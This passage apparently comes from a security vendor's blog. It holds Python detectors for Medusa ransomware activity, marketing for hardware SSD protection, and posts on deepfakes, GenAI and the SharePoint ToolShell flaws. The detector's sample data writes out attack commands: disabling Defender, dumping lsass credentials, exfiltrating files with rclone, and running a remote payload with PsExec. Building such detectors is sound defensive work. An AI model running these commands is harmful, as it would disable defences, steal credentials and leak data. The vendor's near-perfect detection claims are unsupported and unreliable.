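        return Alert("lateral_movement", "wmic remote process creation", ev.command_line)
    return None


RULES = [rule_kill_security, rule_defender_registry, rule_encoded_powershell,
         rule_lsass_dump, rule_upload_tool, rule_remote_exec]


def detect(events: List[ProcessEvent]) -> List[Alert]:
    """Run every rule over every event; an event may raise more than one alert."""
    return [a for ev in events for rule in RULES if (a := rule(ev)) is not None]


# Constructed sample: command lines an affiliate might leave in process logs.
ENCODED = base64.b64encode("Set-MpPreference -DisableRealtimeMonitoring $true".encode("utf-16-le")).decode()
SAMPLE_EVENTS = [
    ProcessEvent(r"C:\Windows\System32\taskkill.exe", 'taskkill /f /im MsMpEng.exe /im "Veeam.Backup.Service.exe"'),
    ProcessEvent(r"C:\Windows\System32\reg.exe",
                 r'reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f'),
    ProcessEvent(r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 f"powershell.exe -nop -w hidden -EncodedCommand {ENCODED}"),
    ProcessEvent(r"C:\Temp\procdump64.exe", r"procdump64.exe -accepteula -ma lsass.exe C:\Temp\lsass.dmp"),
    ProcessEvent(r"C:\Temp\rclone.exe", r"rclone.exe copy C:\Temp\finance.7z remote:staging --transfers 8"),
    ProcessEvent(r"C:\Temp\PsExec64.exe", r"PsExec64.exe \\10.0.0.12 -s -d cmd /c C:\Temp\payload.exe"),
    ProcessEvent(r"C:\Windows\System32\taskkill.exe", "taskkill /f /im notepad.exe"),  # benign, stays quiet
]

if __name__ == "__main__":
    for a in detect(SAMPLE_EVENTS):
        print(f"[{a.phase}] {a.rule}\n    {a.command_line}")
```

Run it to print one alert per matching event. The encoded-PowerShell rule decodes the Base64/UTF-16LE payload so the actual script lands in the alert rather than a blob, and the taskkill rule only fires for agents in the list, so a routine `taskkill /im notepad.exe` stays quiet. In production the lists would be tuned to the agents actually deployed, and `net stop` / `sc stop` variants of the service-killing step would be added alongside taskkill.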

Once data is exfiltrated, Medusa affiliates launch the ransomware payload to encrypt files across the network, rendering them inaccessible to the victim without a decryption key.

How the Medusa Encryption Works

Files on infected machines are encrypted with AES (Advanced Encryption Standard), a symmetric cipher chosen for speed. The AES key material is in turn encrypted with an RSA public key held by the attackers, so it cannot be recovered from the infected host; the corresponding private key, or a decryptor built around it, is only handed over after payment. Encrypted files typically carry the custom extension .MEDUSA, and ransom notes named !!!READ_ME_MEDUSA!!!.txt are dropped in affected directories. The ransom notes contain:

  • Instructions for payment
  • Links to dark web negotiation sites
  • A threat to publish exfiltrated data
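To make the encryption-phase signals concrete, here is an added Python heuristic (illustrative, and not X-PHY's detection logic, which runs in the SSD rather than on the host) that scores per-process file writes on the three observable traits described above: high-entropy content replacing documents, the .MEDUSA extension, and the !!!READ_ME_MEDUSA!!!.txt note. The entropy threshold, the file-write event shape, the process names and PIDs are assumptions, and a seeded PRNG stands in for AES output since only its near-uniform byte distribution matters here.

```python
"""Write-pattern heuristic for the encryption phase described above.

An encryptor looks different from ordinary software at the file system: it
rewrites many files with near-random (high-entropy) bytes, renames them to
a new extension (.MEDUSA) and drops ransom notes. This scores file writes
per process on those three signals. Events and contents are constructed.
"""
import math
import random
from collections import Counter, defaultdict
from dataclasses import dataclass
from typing import Dict, List, Tuple

RANSOM_EXT = ".medusa"
RANSOM_NOTE = "!!!read_me_medusa!!!.txt"
ENTROPY_THRESHOLD = 7.5  # bits/byte: AES output sits near 8.0, documents near 4-5 (assumed cut-off)
MIN_SAMPLE = 256         # fewer bytes give an unreliable entropy estimate
MIN_FILES = 3            # encrypted-looking writes needed before a process is flagged


def shannon_entropy(data: bytes) -> float:
    """Shannon entropy in bits per byte: 0.0 for constant data, 8.0 for uniform bytes."""
    if not data:
        return 0.0
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())


@dataclass
class FileWrite:
    pid: int
    process: str
    path: str    # path the file has after the write (or rename)
    data: bytes  # bytes written; empty for a pure rename


@dataclass
class ProcessScore:
    ransom_ext_writes: int = 0
    high_entropy_writes: int = 0
    notes_dropped: int = 0

    def is_ransomware(self) -> bool:
        # A ransom note is decisive. Otherwise require both signals on several
        # files, so an archiver writing one high-entropy .7z is not flagged.
        return self.notes_dropped > 0 or (
            self.ransom_ext_writes >= MIN_FILES and self.high_entropy_writes >= MIN_FILES)


def score_writes(events: List[FileWrite]) -> Dict[Tuple[int, str], ProcessScore]:
    scores: Dict[Tuple[int, str], ProcessScore] = defaultdict(ProcessScore)
    for ev in events:
        s = scores[(ev.pid, ev.process)]
        name = ev.path.replace("\\", "/").rsplit("/", 1)[-1].lower()
        if name == RANSOM_NOTE:
            s.notes_dropped += 1
            continue
        if name.endswith(RANSOM_EXT):
            s.ransom_ext_writes += 1
        if len(ev.data) >= MIN_SAMPLE and shannon_entropy(ev.data) >= ENTROPY_THRESHOLD:
            s.high_entropy_writes += 1
    return dict(scores)


def flag_ransomware(events: List[FileWrite]) -> List[Tuple[int, str]]:
    """(pid, process) pairs whose write pattern matches the encryption phase."""
    return sorted(k for k, s in score_writes(events).items() if s.is_ransomware())


# Constructed sample data. A seeded PRNG stands in for AES ciphertext; only the
# near-uniform byte distribution matters to the heuristic, not real encryption.
_rng = random.Random(2025)


def _ciphertext_like(n: int = 4096) -> bytes:
    return bytes(_rng.getrandbits(8) for _ in range(n))


_DOC = b"Quarterly revenue figures for the finance team, draft v3.\n" * 40
SAMPLE_EVENTS = [
    FileWrite(1200, "winword.exe", r"C:\Share\finance\q3.docx", _DOC),
    FileWrite(1300, "7z.exe", r"C:\Temp\backup.7z", _ciphertext_like()),  # compressed, benign
    *[FileWrite(4242, "payload.exe", rf"C:\Share\finance\report{i}.xlsx.MEDUSA", _ciphertext_like())
      for i in range(4)],
    FileWrite(4242, "payload.exe", r"C:\Share\finance\!!!READ_ME_MEDUSA!!!.txt", b"constructed ransom note text\n"),
]

if __name__ == "__main__":
    for (pid, proc), s in score_writes(SAMPLE_EVENTS).items():
        verdict = "RANSOMWARE" if s.is_ransomware() else "ok"
        print(f"{proc:12} pid={pid:<5} ext={s.ransom_ext_writes} entropy={s.high_entropy_writes} "
              f"notes={s.notes_dropped} -> {verdict}")
```

The 7z.exe event shows the classic false positive: compressed archives are also high-entropy, which is why the rule requires the extension signal as well unless a ransom note appears. In practice the same scoring would be fed from a file-system minifilter or EDR telemetry and would trigger isolation of the process rather than a print.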

VII. Extortion

The Medusa ransom note demands victims make contact within 48 hours via either a Tor browser-based live chat or an end-to-end encrypted instant-messaging platform. If the victim does not respond to the ransom note, Medusa actors will reach out to them directly by phone or email. On Medusa Blog, the attackers display their victims’ ID alongside countdowns to the release of information. They also post ransom demands with direct hyperlinks to Medusa-affiliated cryptocurrency wallets. At this stage, Medusa concurrently advertises the sale of the data to interested parties when the countdown timer ends. Victims can additionally pay $10,000 USD in cryptocurrency to add a day to the countdown timer.

Medusa Ransomware Note

How X-PHY Protects Against Medusa Ransomware

Medusa is a highly sophisticated ransomware that uses phishing, vulnerability exploits, credential theft, and double extortion. Unlike traditional ransomware protection tools that rely heavily on software, X-PHY embeds AI-driven protection directly into the SSD, the ultimate target of ransomware attacks. This means that even when all the other defenses have been bypassed, X-PHY will be the last line of defense standing to protect your data right where it resides.

The critical steps in a Medusa operation are what X-PHY is built to detect and stop. For instance, the attack depends on disabling security tools and exfiltrating sensitive data before encryption begins. These steps fail against X-PHY because its AI is embedded in the hardware, watching for abnormal data access patterns and stopping threats before they cause real harm.

For instance, when Medusa attempts to exfiltrate sensitive data, X-PHY’s AI will detect the abnormally high volume of read operations, triggering SSD lockdown. This will instantly block data transfer and send an alert to the security team about the attempted exfiltration. Blocking the exfiltration phase of Medusa ransomware and locking down the SSD halts the rest of the Medusa processes, thus ensuring the organization’s sensitive data remains protected from the attackers.

The most significant phase of the Medusa ransomware involves encrypting files using AES, appending a .MEDUSA extension, and making the data inaccessible. X-PHY detects ransomware encryption patterns through advanced AI models analyzing how files are accessed and written. Once an attack has been detected, X-PHY interrupts the process of encryption in real time and locks the drive instantly. This will ensure that sensitive data is protected from unauthorized encryption, halting the entire Medusa process.

Why X-PHY is Uniquely Effective Against Medusa
  • X-PHY’s hardware-level protection means that the solution doesn’t rely on OS or AV software that Medusa can disable.
  • AI-powered anomaly detection gives near 100% detection of unusual patterns even for zero-day threats.
  • Immediate response by shutting down and locking the drive prevents encryption and data theft in real time.
  • Zero Trust architecture ensures access is always verified.
Trust is Still Mission Possible in the Age of Deepfakes https://x-phy.com/trust-is-still-mission-possible-in-the-age-of-deepfakes/ https://x-phy.com/trust-is-still-mission-possible-in-the-age-of-deepfakes/#respond Wed, 17 Sep 2025 06:57:20 +0000 https://x-phy.com/?p=109710 “A video of a person in which their face or body has been digitally altered so that they appear to be someone else, typically used maliciously or to spread false information.”

This definition of a deepfake has now worked its way into the Oxford English Dictionary, reflecting how mainstream and pervasive deepfakes have become. If anything, it demonstrates that the threat is here to stay. 

In the deepfake conversation, it’s important to distinguish that not all AI-generated content is created equal. Some uses are creative and helpful, while others are deceptive and harmful. The distinction lies in intent.

To understand the difference, let’s step into a carnival.

AI-Generated Content – The Magician

On one side of the carnival tent, a magician conjures a dazzling, original painting out of thin air. It's trickery, but you're in on the fun. The magician winks, and you cheer, entertained, inspired, maybe even amazed.

That magician represents AI-generated content.

AI models like ChatGPT, DALL·E, DeepSeek, Grok and a whole host of other AI tools enable the creation of content, whether that’s a surreal illustration or a cool video clip of Godzilla working in your office. Their purpose? Creativity, productivity, empowerment, and fun.

This is where the category of harmless deepfakes fits in. TikTok face-swap filters, parody videos where celebrities "sing" unexpected songs, or playful experiments like the Tom Cruise parody are entertaining precisely because the audience understands they're not real. They belong in the magician's act: fun illusions made to amuse, not to deceive.

The intent here is clear: whether it’s generative AI or parody-style deepfakes, the purpose is creativity, inspiration, or laughter — not harm.

Malicious Deepfakes – The Con Artist

On the other side of the carnival, a con artist steps on stage with a painting for auction, but it's a forgery. They pass it off as priceless, tricking the crowd into believing it's real, all for their own profit.

That’s the world of malicious deepfakes.

They rely on the very same AI tools and technologies that power fun, creative, and educational applications. The difference lies in intent. Where AI-generated content aims to entertain or inspire, malicious deepfakes are engineered to deceive.

Whether it’s impersonating a CEO to authorize fraudulent wire transfers, fabricating political speeches to sway public opinion, or creating non-consensual content to damage reputations, the con artist’s goal is always the same: profit, manipulation, or harm.

Here, the intent isn’t to entertain — it’s to deceive. And that’s what makes malicious deepfakes so dangerous: they erode trust at its core.

Case Study: The Tom Cruise Deepfake

All images above are deepfake videos meant to impersonate Tom Cruise — none are the actual actor.

In 2021, TikTok exploded with videos of “Tom Cruise” — playing golf, telling stories, even doing magic tricks. Millions of people were captivated.

But here’s the twist: it wasn’t Tom Cruise.

The creator, known as @deeptomcruise on TikTok, is a skilled impersonator who studied Tom’s voice, gestures, and mannerisms. Combined with faceswap AI and post-production editing, the result was a deepfake so convincing that even seasoned viewers did a double take.

This was a magician’s trick — a parody, not a scam. But it highlighted how thin the line can be. The very same techniques that made millions laugh could just as easily be misused to mislead millions more.

X-PHY Deepfake Detector: Seeing What Humans Can’t

That’s where the X-PHY Deepfake Detector comes in. A tool that spots and surfaces manipulated content that is invisible to the human eye. It detects subtle signs of manipulation, such as unnatural micro-expressions, lip-sync mismatches, and synthetic audio fingerprints.

All of this happens in real time, on-device, with evidence logging built in. No cloud uploads. No privacy trade-offs. Just secure, trustworthy detection when and where it matters most.

Making digital trust a possibility

From carnival tricks to viral parodies, AI-generated content and deepfakes are reshaping the way we experience digital media. AI-supported creativity can inspire us, but malicious deepfakes threaten to erode trust at its core.

There is no denying that deepfakes have gone mainstream. The Tom Cruise case, among many others, shows us how convincing they can be. And the X-PHY Deepfake Detector shows us that spotting them isn't Mission Impossible.

Sign up for a 7-Day free trial or drop us a message to learn more about enterprise pricing.

 

Fix The Risk, Don’t Ban The Tool: How To Secure GenAI At Work https://x-phy.com/fix-the-risk-dont-ban-the-tool-how-to-secure-genai-at-work/ https://x-phy.com/fix-the-risk-dont-ban-the-tool-how-to-secure-genai-at-work/#respond Wed, 10 Sep 2025 04:44:38 +0000 https://x-phy.com/?p=109497 GenAI is transforming the way we work – making everyday tasks faster and more efficient. 

But with convenience comes hidden risks. Employees may unknowingly expose sensitive corporate data when using GenAI tools, creating new avenues for insider threats.

In a recent Forbes Technology Council article, our CEO & Co-founder Camellia Chan explains why the solution is not to ban GenAI in the workplace. Instead, organisations need to fix the risks, not the tool.

Key Highlights from the Article

  1. Shadow AI creates insider threats: Well-intentioned employees often use GenAI on personal accounts, but this “shadow AI” usage can leak sensitive data outside IT’s visibility.
  2. Traditional defenses fall short: Software-based tools like DLP and behavioral analytics are essential, but they can miss risks – especially when compromised credentials make malicious activity look legitimate.
  3. Hardware-level zero trust is the missing piece: Embedding security directly at the physical layer, within the memory storage, enables autonomous, real-time defense. By detecting unusual activity such as mass data transfers – even after a breach – hardware-level security stops threats before data escapes. 
  4. A holistic strategy is needed: The path forward is not banning GenAI but creating a GenAI-aware security strategy that blends governance, employee education, monitoring, and hardware-based protection.

Explore how X-PHY brings this vision to life with our patented AI-embedded hardware security solutions, available now on our X-PHY eStore.

Read the Full Article: Fix the Risk, Don’t Ban the Tool: How To Secure GenAI At Work on Forbes.

3 Intriguing Conversations from FMS 2025: Trust Meets Speed in Memory Innovation https://x-phy.com/3-intriguing-conversations-from-fms-2025-trust-meets-speed-in-memory-innovation/ https://x-phy.com/3-intriguing-conversations-from-fms-2025-trust-meets-speed-in-memory-innovation/#respond Mon, 25 Aug 2025 07:08:27 +0000 https://x-phy.com/?p=108928

The X-PHY Team at FMS 2025, (from L-R) Jaime Coreano, Camellia Chan, Jenevieve Que, Pradosh Verlekar

“In the race for speed, we can’t forget the race for trust.”

That was the biggest takeaway our Product Director, Pradosh Verlekar, had from his very first industry event with X-PHY Inc.

Together with CEO, Camellia Chan, and other members of the team, Pradosh attended his maiden event with X-PHY Inc at the Future of Memory and Storage (FMS), held between August 5–7 2025, at the Santa Clara Convention Center in California’s Silicon Valley – the heart of the global technology ecosystem.

A marquee event for the memory and storage community, FMS is the world’s largest international showcase of its kind. Now in its 19th year, the summit brings together leading companies, researchers, and innovators to unveil the latest technologies, products, and trends shaping the future.

For X-PHY, FMS provides the perfect stage to spotlight how memory is no longer just about performance or capacity, but an essential frontier for intelligent, autonomous, and dynamic cybersecurity.

In this article, we revisit FMS 2025 through Pradosh’s lens – recounting the conversations that stuck with him, the lessons he carried forward, and how the conversation at this exclusive event highlighted the need for balance between speed and trust.

3 conversations that echoed our sentiments

At the X-PHY booth, where the team showcased the X-PHY SSD alongside Flexxon’s industrial storage solutions, Pradosh witnessed the industry’s pulse shift from speed to trust. Here are three standout moments:

  • From slowdown to speed-up
A storage architect approached, skeptical that cybersecurity meant compromise. “Security always slows us down,” he said. By the end of the chat, he was sold on X-PHY’s hardware-level protection. His key takeaway? Secure storage doesn’t bottleneck performance – it accelerates trust, enabling faster deployments.
  • Trust fuels collaboration
A European systems integrator raved about the Community-Based Root of Trust, presented by our US Sales Director, Jaime Coreano. He saw it not as “extra security” but as a catalyst for innovation. “When every link in the chain trusts the data, we innovate faster,” he noted.
  • Security by design as the default
A startup founder came for Gen5 throughput specs but left buzzing about anomaly detection at the storage layer. He realized: security isn't a bolt-on; it's a design choice that builds scalable, confident products.

Pradosh on stage at the FMS theatre speaking with the audience about X-PHY’s hardware-based holistic and proactive security philosophy

Pradosh summed it up by sharing, “At an event obsessed with ‘bigger, faster,’ people leaned in when we talked safer, smarter, and more trusted.” This shift underscores an essential but often overlooked truth: performance and protection are two sides of the same coin. Watch the full video on-demand HERE.

Getting to know the team

For Pradosh, FMS2025 was not just about meeting customers and partners, it was also his first time spending full days on the ground with the X-PHY team. Those moments left just as strong an impression as the event itself:

  • Camellia Chan, CEO: Even with a packed schedule of meetings, media briefings, and the demands of a global team, Camellia still carved out time for her daily 5km runs; she even did 27 push-ups in a row after day 2 of the event. That same discipline and stamina fuels how she leads the team: focused, prepared, and ready to make every conversation count.
  • Jaime Coreano, US Sales Director: Pradosh notes that Jaime, a former windsurfer, brings the same precision and balance to the booth that he once brought to the waves. Whether explaining the details of community-based root of trust or walking a customer through our range of products, he made sure every message landed with clarity.
  • Jenevieve Que, Business Strategist: Pradosh learned that Jenevieve has travelled to over 50 countries, and it shows: she approaches every interaction like an explorer, with a knack for drawing out new perspectives from people and uncovering opportunities the team might otherwise have missed.

Trust as the takeaway

One partner summed it up perfectly: “The future of storage isn’t just about moving data faster. It’s about knowing you can trust every bit you move.” In a data-driven world, speed without trust is chaos. Leaders need data that’s fast, accurate, and reliable. 

X-PHY’s mission at FMS? To ignite this conversation across the memory and storage community. 

As Pradosh looked back on his first event with X-PHY, he recognised a clear thread connecting all conversations together:

“In the race for speed, we can’t forget the race for trust. Seeing that vision resonate with engineers and executives alike made this event a milestone not just for me, but for X-PHY’s role in shaping the future of secure storage.”

Join the Secure Storage Revolution

FMS 2025 showed us that trust is the new speed. Want to dive deeper into how X-PHY is shaping secure storage? Follow us on LinkedIn for the latest insights or contact us to explore our solutions.

Hackers Exploiting Microsoft Flaw to Attack Governments, Businesses https://x-phy.com/hackers-exploiting-microsoft-flaw-to-attack-governments-businesses/ https://x-phy.com/hackers-exploiting-microsoft-flaw-to-attack-governments-businesses/#respond Mon, 28 Jul 2025 03:17:42 +0000 https://x-phy.com/?p=108462 When Microsoft urges its users to download a security update, it usually means two things:

  1. A breach has already happened
  2. Many more are still vulnerable

That’s exactly what happened on July 19, when Microsoft issued an urgent alert about two zero-day vulnerabilities.

At the time of writing:

On July 19 2025, Microsoft issued an urgent alert for two zero-day vulnerabilities affecting on-premises SharePoint servers, now tracked as CVE-2025-53770 and CVE-2025-53771, and collectively dubbed ToolShell. These vulnerabilities do not impact SharePoint Online but pose a severe risk to organizations running on-prem SharePoint instances.

  1. CVE-2025-53770 enables unauthenticated remote code execution (RCE) by exploiting unsafe deserialization, allowing attackers to gain complete control of compromised servers. It carries a critical CVSS score of 9.8/10 and is already being actively exploited in global campaigns targeting government, telecom, and software sectors.
  2. CVE-2025-53771 is a spoofing/path traversal vulnerability allowing attackers to bypass authentication via improper header validation. When chained with the first vulnerability, it enables the full ToolShell exploit chain.

The ToolShell attack chain has been used to:

  1. Gain access, steal credentials, and in some cases, deploy ransomware
  2. Extract sensitive cryptographic keys
  3. Use in-memory payloads that evade traditional defenses by avoiding file-based artifacts

Researchers and Microsoft have identified three active attack clusters using evolving tactics and payloads to avoid detection. Microsoft has released emergency out-of-band patches for SharePoint Subscription Edition and 2019 (with 2016 patches pending). 

Security agencies urged immediate patching, key rotation, and enhanced endpoint monitoring.

In short, ToolShell is an evolving, active, and critical threat to on-prem SharePoint deployments.

By the time Microsoft's alert went out, the first wave of breaches had already begun on July 18, with hackers planting web shells that leaked the servers' cryptographic key material. Those keys are what the server uses to sign and validate requests, so an attacker who holds them can forge valid requests and regain access even after the patch is applied. That is why the guidance pairs patching with key rotation, and why this is far more dangerous than a typical "update and you're safe" incident.

In a comment to Security Boulevard, our CEO, Camellia Chan, shared, “No amount of patching or perimeter defense can guarantee safety when trust assumptions are baked into software architecture. Organizations need to embed protection directly in hardware to close the gap software alone can’t.”

Cybersecurity agencies in the U.S., Canada, and Australia warned that this is not a “patch-and-forget” problem. 

Experts recommend:

  1. Patch immediately, but never assume you’re safe
  2. Investigate for compromise both before and after updates
  3. Harden defenses with zero-trust, hardware-level protections that detect and block threats in real time

The ToolShell campaign is a wake-up call for anyone running exposed on-premises systems. 

Read the full article on Security Boulevard here: https://securityboulevard.com/2025/07/hackers-exploiting-microsoft-flaw-to-attack-governments-businesses/

To learn more about how our solutions can support your cybersecurity strategy, drop us a message at info@x-phy.com, and let’s get started!
